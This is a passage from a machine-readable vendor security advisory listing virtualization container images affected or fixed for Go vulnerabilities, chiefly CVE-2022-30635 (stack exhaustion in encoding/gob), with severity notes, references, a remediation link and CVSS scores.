"8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/xml: stack exhaustion in Unmarshal", }, { cve: "CVE-2022-30635", cwe: { id: "CWE-1325", name: "Improperly Controlled Sequential Memory Allocation", }, discovery_date: "2022-07-14T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2107388", }, ], notes: [ { category: "description", text: "A flaw was found in golang. When calling Decoder, Decode on a message that contains deeply nested structures, a panic can occur due to stack exhaustion and allows an attacker to impact system availability.", title: "Vulnerability description", }, { category: "summary", text: "golang: encoding/gob: stack exhaustion in Decoder.Decode", title: "Vulnerability summary", }, { category: "other", text: "OpenShift Container Platform (OCP) starting from 4.10 stream is already compiled in the patched version of Go, hence is not affected by this vulnerability.The vulnerability has been rated as moderate instead of high because the vulnerability can only result in a minor denial of service.\n\nWithin regulated environments, a combination of the following controls acts as a significant barrier to successfully exploiting a CWE-1325: Improperly Controlled Sequential Memory Allocation vulnerability and therefore downgrades the severity of this particular CVE from Moderate to Low.\n\nAccess to the platform is granted only after successful hard token-based multi-factor authentication (MFA) and is governed by least privilege to ensure only authorized users and roles can execute or modify code. Static code analysis and peer reviews enforce strong input validation and error handling, preventing improperly validated inputs from causing system instability, data exposure, or privilege escalation. In the event of successful exploitation, process isolation limits the impact of excessive sequential memory allocation by restricting memory use per process, preventing any single process from exhausting system resources. Finally, the platform uses memory protection mechanisms such as Data Execution Prevention (DEP) and Address Space Layout Randomization (ASLR) to reduce the risk of memory allocation-based attacks.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], known_not_affected: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-controller@sha256:e6ddc32f82e940d364e0a3d63c28b4bd41b71574f9479b6d6b01de948baa8cab_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportproxy@sha256:2dc6b5eca4ba0daffe57ff174efc35764a2021eef35ef84c3d030c0f97329ece_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-exportserver@sha256:dd59838c20f30c7049cbdc4646b8b6f73ce8f33fa13c352ee22985673eaf95e2_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-handler@sha256:cce366a6b1aa42a9798a8c714dcb795d1c653dfe0ba06c997e65dbba0318e537_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-launcher@sha256:bd5b00ece84caed816b3f3cc80d8570324e1e8f975cf2c2320726d88fb64f33a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-operator@sha256:6c4b16ac62e673d8f5116d592836506be72c5ebd2a07ffc828fee86514db0e9d_amd64", "8Base-CNV-4.12:container-native-virtualization/virtio-win@sha256:cd321e3d82a87139edabf223414b892c99857d7ac7d089b870e227ea98c970e0_amd64", "8Base-CNV-4.12:container-native-virtualization/vm-network-latency-checkup@sha256:5a1502efeeaa3958e5755ce07dcb8314305d75c88cc69ddc7d515457935cdc69_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-30635", }, { category: "external", summary: "RHBZ#2107388", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-30635", url: "https://www.cve.org/CVERecord?id=CVE-2022-30635", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-30635", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-30635", }, { category: "external", summary: "https://go.dev/issue/53615", url: "https://go.dev/issue/53615", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", url: "https://groups.google.com/g/golang-announce/c/nqrv9fbR0zE", }, ], release_date: "2022-07-12T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2023-01-25T11:11:29+00:00", details: "Before applying this update, you must apply all previously released errata\nrelevant to your system.\n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2023:0408", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.12:container-native-virtualization/bridge-marker@sha256:086a9922f34161e5b75d204a0c3281c941f81f76ef8784de434cc79acc76174c_amd64", "8Base-CNV-4.12:container-native-virtualization/cluster-network-addons-operator@sha256:d2c19fd4c2327eb84179acf652157982b29c365d8a526d70517c6dd93ea6ebc7_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-containernetworking-plugins@sha256:3d6003dea97e48d240668e55b2705f0251259006251abafaa3dc08fbc69f1312_amd64", "8Base-CNV-4.12:container-native-virtualization/cnv-must-gather-rhel8@sha256:dcb95d2b4958ce69f8fcf61c9c90e0516d7844db62f2297ebf1ef18e5d8c05b4_amd64", "8Base-CNV-4.12:container-native-virtualization/hco-bundle-registry@sha256:73680901c7733ba27f729fd6475971e0909c2fe9efacf74d556f961a1494274e_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-csi-driver@sha256:a0b75e357628ca6b2ca32ab3fdbf531fd8da438a7a6ae8988ef897d2c001d9cb_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:b9d84e63f789c70e31cf60fe06d41359363afc7bbd86a78ac7132f8dae4c467a_amd64", "8Base-CNV-4.12:container-native-virtualization/hostpath-provisioner-rhel8@sha256:5239dcb229b060a818befd52a1e27b18142985abe0e39cef41eadd66f8b21ec1_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-operator@sha256:8b311b48437c79a6859a84f62cfd10ca8e6dcff4ce665a98ed78633552a172ca_amd64", "8Base-CNV-4.12:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:e912171328517664f0298322a7992a6e0e00118dc496ff94ee84190d9057db68_amd64", "8Base-CNV-4.12:container-native-virtualization/kubemacpool@sha256:ab5a239a35e3de8566cb76db0d59ae92e290a3756d39a2298290f1ab3c7b56c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-console-plugin@sha256:e7dd17d4d206b2d37f24a2ed28bf3d2d6a40463da6cbc6b5696555b455f90055_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-ssp-operator@sha256:09a834b1f71a19cf9a616ffd9eb04408972f9b8f9549777cab0935f63931c993_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:66284c45e82862dc7c1505fcdfe7b14e72c93c5e7fa6b7108a945220279641e9_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:462770d258407ea93c14c9a99fb4450536261202d1d63a681634af2193c2b062_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:31d22c0be03bbb222967d953d35189173fbeb60d1cb32278eb006e8abe78e90c_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:a62ec91155a7bfc776c402e8b513b0e00797d64a95434346a2e3a4cc25f2d3c5_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:35274b72a5562e8675854d8cf2ca3ec0c4d0b619c0e630d7b39b7da8ebd3b143_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:6e6ed3d8b1b906f801e36b82d6976bc421ae8344d71d4c563fe6d8e76b5fe9c4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:b46443d7f21b8b251468e33c929a16008a3ac34a8f50a1d8bc1cd134079ccae4_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:7f11db20a3c635aa48e3dcadfe555d0cd229c4c7f1790f70ee9c9ee78ab55e67_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:4967b4c46d670a2b109c9a2e6e0ebc850a5e1dacaf8cc0ed691668bfa0cbd418_amd64", "8Base-CNV-4.12:container-native-virtualization/kubevirt-template-validator@sha256:bf732669655db1b09ef27bc1964fe7b49943d681a5acc9860497512d8877e13f_amd64", "8Base-CNV-4.12:container-native-virtualization/libguestfs-tools@sha256:4f0d48312d8fe02a17747d65ac644d3e1be2df3cb80a9d0c268acc6ad5b91680_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-marker@sha256:077367d5af11030832a5e63a611395b7fa65ee140b490b6f33f8a23a9392dcd5_amd64", "8Base-CNV-4.12:container-native-virtualization/ovs-cni-plugin@sha256:892e339e8eec78f9865d11984c6dc8e92831ee9a17d6b990cd7fba9f2e506e13_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-api@sha256:cd89350a5e6b3a468acd290819d86f2c77d486fa5a57dbac752f863f1a8a2b23_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-artifacts-server@sha256:9638c34ff48d275842a990deb86110530ffd4937b2b551a4d5263168f7db6d47_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-apiserver@sha256:dd68dfc1a588b4e24e533d61b52b68ab0673fd39a95632314f54e1b85cb5f32d_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-cloner@sha256:879742e59f3416100969a0d0994e49e3f8cd493310bbd0c0e86e969f86daa204_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-controller@sha256:46689591989c8db1fa1f5228b2b9fb51d7abd0425c34951f909ced1fc536f0e4_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-importer@sha256:f2d011c18db1dd0dbe068bc650418c4b3f2f94935c053e76a52736da0f33867a_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-operator@sha256:8b06f96750c3f8e34a7cc8defeda46a92e3ad553159d3dbc7c4e096b483508ee_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadproxy@sha256:84fd85672f6e9891678d6e99c066f8f20a9a2aac08fae11d552d46a317b7f815_amd64", "8Base-CNV-4.12:container-native-virtualization/virt-cdi-uploadserver@sha256:4b231a260a9c0176f4b45aaf8142fa5e6860892b2fa19fad0f3091c423064211_amd64", 